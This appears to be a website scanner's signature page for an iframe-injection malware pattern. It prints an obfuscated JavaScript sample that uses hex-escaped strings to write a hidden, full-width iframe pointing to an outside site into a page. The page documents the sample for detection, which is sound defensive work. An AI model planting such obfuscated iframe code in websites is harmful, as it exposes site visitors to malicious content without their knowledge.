SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.encrypted_iframe_injection.3

malware.encrypted_iframe_injection.3

Description:
Obfuscated code that uses hexadecimal encoded string to injects malicious iframes into a web page.

There are many different ways to obfuscate code that injects iframes. For example:

window["​\x64\x6f\x63\x75\x6d​\x65\x6e\x74"]​["\x77\x72​\x69\x74\x65\x6c\x6e"](​"\x3c\x69​\x66​\x72\x61​\x6d\x65 \x20​\x66​\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\'\x30\' \x20\x68\x65\x69​\x67\x68\x74\x3d\'\x32\x35\x30\x30\' \x20\x73\x63\x72​\x6f\x6c\x6c\x69​\x6e\x67\x3d\'\x6e​\x6f\'\x73\x72\x63\x3d\'\x68\x74​\x74\x70\x3a\x2f\x2f​\x77\x77\x77\x2e\x6d\x61\x7a\x61​\x74\x65\x72\x6f\x6e\x2e\x63​\x6f\x6d\x2f\x27\x20\x77​\x69\x64\x74\x68\x3d\'\x31\x30​\x30\x25\'\x2f\x3e")

Affecting:
Any web site (no specific target).